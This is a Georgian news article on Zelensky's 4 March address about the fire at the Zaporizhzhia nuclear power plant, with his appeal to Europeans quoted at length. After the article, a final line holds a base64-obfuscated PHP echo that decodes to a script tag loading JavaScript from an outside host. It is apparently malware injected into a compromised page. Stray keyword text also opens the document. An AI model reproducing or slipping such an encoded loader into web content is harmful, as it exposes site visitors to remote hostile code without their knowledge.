celsiusi
ავერსი შნაიდერი
უკრაინის პრეზიდენტმა ვოლოდიმირ ზელენსკიმ საგანგებო მიმართვა გაავრცელა 4 მარტის ღამეს და  მსოფლიოს ზაპოროჟიის ატომურ ელექტროსადგურზე ხანძრის შესახებ ამცნო.
 
მან განაცხადა, რომ თუ ზაპოროჟიის ატომურ ელექტროსადგურზე აფეთქება მოხდება, ეს იქნება ევროპის დასასრული:
 
„ევროპამ უნდა გაიღვიძოს. ევროპაში ყველაზე დიდ ატომურ ელექტროსადგურს ახლა ცეცხლი უკიდია. რუსული ტანკები ატომურ სადგურს ესვრიან. ეს არის ტანკები, რომლებიც აღჭურვილია თერმოგამოსახულებით, ასე რომ მათ იციან რას ესვრიან. 
 
ამისთვის მოემზადნენ. მივმართავ ყველა უკრაინელს, ყველა ევროპელს და ყველას, ვინც იცის სიტყვა “ჩერნობილი”, ვინც იცის, რომ ატომურ სადგურზე აფეთქებამ ბევრი მსხვერპლი გამოიწვია. ეს იყო გლობალური კატასტროფა და მის შედეგებს ასობით ათასი ადამიანი ებრძოდა. ათიათასების ევაკუაცია მოხდა და რუსეთს ამის გამეორება სურს და უკვე იმეორებს, მაგრამ 6-ჯერ დიდი. 
 
ევროპელებო, გაიღვიძეთ გთხოვთ. უთხარით თქვენს პოლიტიკოსებს, რუსული ძალები ისვრიან უკრაინის ატომურ სადგურზე. ზაპოროჟის  ატომური სადგური, ქალაქი ენერგოდარი. იქ ექვსი ენერგეტიკული ბლოკია. Ექვსი. ჩერნობილში ერთი ენერგობლოკი აფეთქდა.
 
 ჩვენ დავუკავშირდით ჩვენს ლიდერებს, პარტნიორებს, მე უკვე ვესაუბრე შარლ მიშელს, ოლაფ შოლცს,  დუდას, პრეზიდენტ ბაიდენს. ჩვენ დავუკავშირდით IAEA-ს ხელმძღვანელს და პრემიერ მინისტრ ბორის ჯონსონს.
 
მივმართავ ყველას, ვინც იცის  ჩერნობილი, ვინც იცის, რა მსხვერპლი მოჰყვა. რუსეთს სურს ამის გამეორება, ოღონდ ექვსჯერ უფრო დიდი კატასტროფის. ევროპელებო გაიღვიძეთ”, – ზელენსკიმ მიმართვა კიევის დროით 04.00 საათზე გაავრცელა.
 
დაახლოებით 03.00 საათზე გავრცელდა ცნობა, რომ ზაპოროჟიის ატომურ ელექტროსადგურზე რუსეთის სამხედრო შეტევის შედეგად ხანძარი გაჩნდა.
750
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");